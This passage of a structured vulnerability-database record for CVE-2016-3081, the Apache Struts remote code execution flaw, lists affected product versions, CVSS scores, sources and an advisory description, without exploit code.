connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside 
in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", 
scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "integrated lights out manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: "healthcare analytics 
data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: 
"oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic infrastructure", scope: "eq", 
trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.4", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: 
"7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: 
"7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: "application express", scope: 
"eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "11.1", }, { model: 
"db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, ], sources: [ { db: "BID", id: "87327", }, { db: "BID", id: "91787", }, { db: "JVNDB", id: "JVNDB-2016-002326", }, { db: "CNNVD", id: "CNNVD-201604-585", }, { db: "NVD", id: "CVE-2016-3081", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/a:apache:struts", vulnerable: true, }, { cpe22Uri: "cpe:/a:oracle:micros_retail_xbri_loss_prevention", vulnerable: true, }, { cpe22Uri: "cpe:/a:oracle:flexcube_private_banking", vulnerable: true, }, { cpe22Uri: "cpe:/a:oracle:siebel_crm", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-002326", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Nike Zheng nike.zheng@dbappsecurity.com.cn", sources: [ { db: "CNNVD", id: "CNNVD-201604-585", }, ], trust: 0.6, }, cve: "CVE-2016-3081", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": 
"https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "COMPLETE", baseScore: 9.3, confidentialityImpact: "COMPLETE", exploitabilityScore: 8.6, id: "CVE-2016-3081", impactScore: 10, integrityImpact: "COMPLETE", severity: "HIGH", trust: 1.9, vectorString: "AV:N/AC:M/Au:N/C:C/I:C/A:C", version: "2.0", }, ], cvssV3: [ { attackComplexity: "HIGH", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "HIGH", baseScore: 8.1, baseSeverity: "HIGH", confidentialityImpact: "HIGH", exploitabilityScore: 2.2, id: "CVE-2016-3081", impactScore: 5.9, integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", trust: 1.8, userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2016-3081", trust: 1, value: "HIGH", }, { author: "NVD", id: "CVE-2016-3081", trust: 0.8, value: "High", }, { author: "CNNVD", id: "CNNVD-201604-585", trust: 0.6, value: "HIGH", }, { author: "VULMON", id: "CVE-2016-3081", trust: 0.1, value: "HIGH", }, ], }, ], sources: [ { db: "VULMON", id: "CVE-2016-3081", }, { db: "JVNDB", id: "JVNDB-2016-002326", }, { db: "CNNVD", id: "CNNVD-201604-585", }, { db: "NVD", id: "CVE-2016-3081", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { 
"@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via method: prefix, related to chained expressions. Apache Struts2 Contains a vulnerability that allows execution of arbitrary code. Note that this vulnerability was used proof-of-concept The code has been released. National Vulnerability Database (NVD) Then CWE-77 It is published as CWE-77: Improper Neutralization of Special Elements used in a Command ( Command injection ) http://cwe.mitre.org/data/definitions/77.htmlA remote attacker could execute arbitrary code on the server where the product is running. Apache Struts is prone to a remote code-execution vulnerability. Failed exploit attempts may cause a denial-of-service condition. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. 
The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session Border Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail 
Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system", sources: [ { db: "NVD", id: "CVE-2016-3081", }, { db: "JVNDB", id: "JVNDB-2016-002326", }, { db: "BID", id: "87327", }, { db: "BID", id: "91787", }, { db: "VULMON", id: "CVE-2016-3081", }, ], trust: 2.25, }, exploit_availability: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { reference: "https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=39756", trust: 0.1, type: "exploit", }, ], sources: [ { db: "VULMON", id: "CVE-2016-3081", }, ], }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: 
